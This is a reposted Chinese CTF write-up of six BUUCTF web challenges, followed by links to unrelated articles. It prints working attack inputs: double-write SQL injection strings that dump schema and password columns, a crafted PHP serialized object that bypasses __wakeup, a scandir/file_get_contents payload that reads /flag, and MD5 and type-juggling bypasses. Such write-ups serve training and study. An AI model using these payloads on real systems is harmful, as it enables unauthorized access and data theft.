BUUCTF-WEB(15-20)

news/2024/11/17 1:43:03/文章来源:https://www.cnblogs.com/Muneyoshi/p/18200792

[极客大挑战 2019]BabySQL

打开题目就试了试万能密码,是不行的

image-20240519150211630

推测应该做了过滤

我们密码框输入1' 1 or '1'='1试试

image-20240519151557536

发现我们的or没了,union,select,where都被过滤了,应该是被替换成空字符,所以我们可以双写绕过

uunionnion sselectelect wwherehere

由于这里or被过滤了,我们无法用order用判断字段数,只能union select(以下注入都在密码框进行)

1' uunionnion sselectelect 1,2,3#

image-20240519152102655

爆库名:

1' uunionnion sselectelect 1,2,database()#

image-20240519152209383

爆表名:

1' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'#

image-20240519152640220

爆列名:

1' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_schema='geek'aandnd table_name='b4bsql'#

image-20240519152759357

爆数据:

1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql#

image-20240519153318822

[极客大挑战 2019]PHP

打开题目告诉我们网站备份了

然后我们应该dirsearch扫后台,这里可能是因为平台的原因,扫不出来的

备份文件就是 www.zip

我们访问下载,index.php发现了参数select

image-20240519160241899

然后在class.php这里看怎么去反序列化

image-20240519160323742

我们构造就是

new Name::__construct()->new Name::__destruct()

所以我们需要绕过__wakeup()

CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧_ctf php 反序列化漏洞-CSDN博客

攻击者可以利用这个漏洞来绕过 __wakeup() 函数中的安全检查,从而执行任意代码。攻击者可以使用 O 类型的序列化字符串来创建一个新的对象,并在其中添加任意数量的属性。然后,攻击者可以修改序列化字符串中属性的数量,使其比实际属性数量多。由于 PHP 会忽略多余的属性,攻击者可以绕过 __wakeup() 函数的安全检查,并执行恶意代码。

然后我们打开php在线(此处打印两个变量,为了方便比较数量对应的哪个数值)

image-20240519161217020

构造链子后因为我们需要绕过__wakeup(),所以我们需要改一下这个数量

给我标记的地方改成三,然后复制URL编码后的序列化的数据。

image-20240519161316419

payload:

?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

image-20240519161453754

[ACTF2020 新生赛]BackupFile

就是备份文件,dirsearch扫描

image-20240519163203428

发现了index.php.bak,下载

image-20240519163707013

在PHP中:= = 为弱相等,即当整数和字符串类型相比较时。会先将字符串转化为整数然后再进行比较

所以我们payload:

?key=123

image-20240519164914400

[RoarCTF 2019]Easy Calc

参考:

RoarCTF 2019 - Easy Calc - ch0bits - 博客园 (cnblogs.com)

RoarCTF 2019]Easy Calc 详细题解笔记 Writeup_scandir被过滤-CSDN博客

PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_参数解析 绕过-CSDN博客

在源码里面找到了一个文件

image-20240519201624194

我们访问一下

image-20240519201929861

这里我也不会了就搜了一下题解

查看根目录

?%20num=print_r(scandir(chr(47)));

image-20240519203614757

查看flag

?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

image-20240519203952246

[极客大挑战 2019]BuyFlag

来到买flag的地方,看一下源码

image-20240519204806236

我们需要post传参,我burp抓包看一眼

image-20240519205326964

条件就是我需要是cuit的学生,然后才能买,这里我注意到user=0,我们改成1试试,成功了

image-20240519205415709

那我们就差个money还有password

password就用字符串绕过

POST的内容如下:

password=404a&money=1000000000

image-20240519205704886

他说钱长度太多了,那我们就科学计数法

password=404a&money=1e9

image-20240519205756660

[BJDCTF2020]Easy MD5

参考:

[BJDCTF2020]Easy MD5(详细)-CSDN博客

总结ctf中 MD5 绕过的一些思路_ctf md5-CSDN博客

这里打开题目,就个输入框,啥也没有

我这里也挺傻逼,我抓包也没看到hint,看wp才看到

image-20240519211931880

然后意思就是后面需要真值,然后才行

答案就是需要传

ffifdyop

然后跳到新界面,然后查看源码,md5弱比较

image-20240519212054698

直接传

a=QNKCDZO&b=240610708

又跳了一个界面,代码如下:

image-20240519212242545

这次是===是强比较,类型,数值都得比较,那我们就数组绕过

param1[]=1&param2[]=2

image-20240519212414869

image-20240519212436496

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/708934.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

11个国内外免费域名解析服务

11个国内外免费域名解析服务 一般域名使用注册商提供的域名解析服务虽然方便,但功能大多有限,特别是目前国内还会针对某些DNS服务器进行屏蔽,造成网站无法解析的情况出现,因此,使用第三方域名解析服务也是中国网站的必要选择,这里就介绍一些常见的免费域名解析服务。 域名…

5/19/2024 测试

10pts 拿下 D1!挂分挂了 290pts! 痛失 rk3总结P 都不是,(本人)成绩构思依托(10pts)。 有重题,而且是同一场比赛出现两道 一模一样 的题(T1 && T4)题目 & 题解 T1 Color Description 有 \(n\) 个球排成一列,每个球都有一个颜色,用 \(A \sim Z\) 的大写字…

redis存储之序列化问题

1.问题描述:在SpringBoot集成Redis过程中,添加进redisf的内容如下2.出现这种情况的原因 (1) 键和值都是通过Spring提供的Serializer序列化到数据库的 (2) RedisTemplate默认使用的是JdkSerializationRedisSerializer,StringRedisTemplate默认使用的是StringRedisSerializer 3…

Vue3使用vue-cropper截图上传

!!!!!!!已使用另一个截图上传工具,稍后更新博客!!!!!! 使用vue-cropper进行截图上传 先安装 npm i vue-cropper编写组件 在components中添加imageCropper.vue 代码如下 <template><div><div><imgv-if="value"class="mb-2&qu…

渗透提权基础--linux权限

linux用户权限 在Linux系统中,根据权限的不同,大致可以将用户分为三种:超级用户、普通用户和虚拟用户。序号1为超级用户,分析出他为超级用户并不仅仅是因为他的用户名为root,还有他的UID(用户ID)和GID(组ID)为0,这是超级用户很重要的属性,且他的HOME目录为/root。 …

浅谈 FHQ Treap

浅谈 FHQ Treap 目录浅谈 FHQ Treap简单介绍前置操作结构分裂 split合并 merge一般操作Insertdelete查询排名为 \(x\) 的数查询 \(v\) 的排名 rank查询 \(x\) 的前驱 precursor查询 \(x\) 的后继 successor版题 简单介绍 FHQ Treap,以下简写为 \(fhq\),是一种treap(树堆)的变体…

INFINI Labs 产品更新 | Easysearch 1.8.0 发布数据写入限流功能

INFINI Labs 产品又更新啦~,包括 Easysearch v1.8.0、Gateway、Console、Agent、Loadgen v1.25.0。本次各产品更新了很多亮点功能,如 Easysearch 新增数据写入限流功能,可实现节点、分片级限流;Gateway 修复数据迁移过程中因消费不及时解压缩导致部分数据记录损坏而丢失记录…

OpenStack Centos7 T版本搭建

目录Centos7搭建OpenStack T版本 --上1. 环境准备(所有节点操作)1.1 修改主机名1.2 关闭selinux 以及防火墙1.3 修改hosts1.4 配置时间同步controller 操作compute以及其他节点操作1.5 配置OpenStack 软件包1.6 安装数据库1.7 安装消息队列1.8 安装memcached1.9 安装etcd2. 安装…

数据库开发基础(JDBC)

时间:2024-05-17日,星期五 数据库开发基础(Java) 课程内容 JDBC快速入门、使用JDBC开发细节、连接池与JDBC进阶使用JDBC使用步骤数据库查询方法数据库写入方法SQL注入攻击的应对连接池的使用Apache Commons DBUtilsJDBC快速入门 JDBC是Java中为了去方便使用各种数据而创造出…

视野修炼-技术周刊第84期 | Mako

① npmmirror 下线 unpkg 服务 ② Mako - 又一基于 Rust 的构建工具 ③ Icnes - 图标集合检索 ④ go-masonry-gallery - 图片瀑布流页面生成 ⑤ Color Pick - 在线从图片中提取颜色的 ⑥ 制作 CSS 形状的现代指南 ⑦ 针对前端初学者的项目合集 ⑧ Jan - 本地运行大模型客户端欢…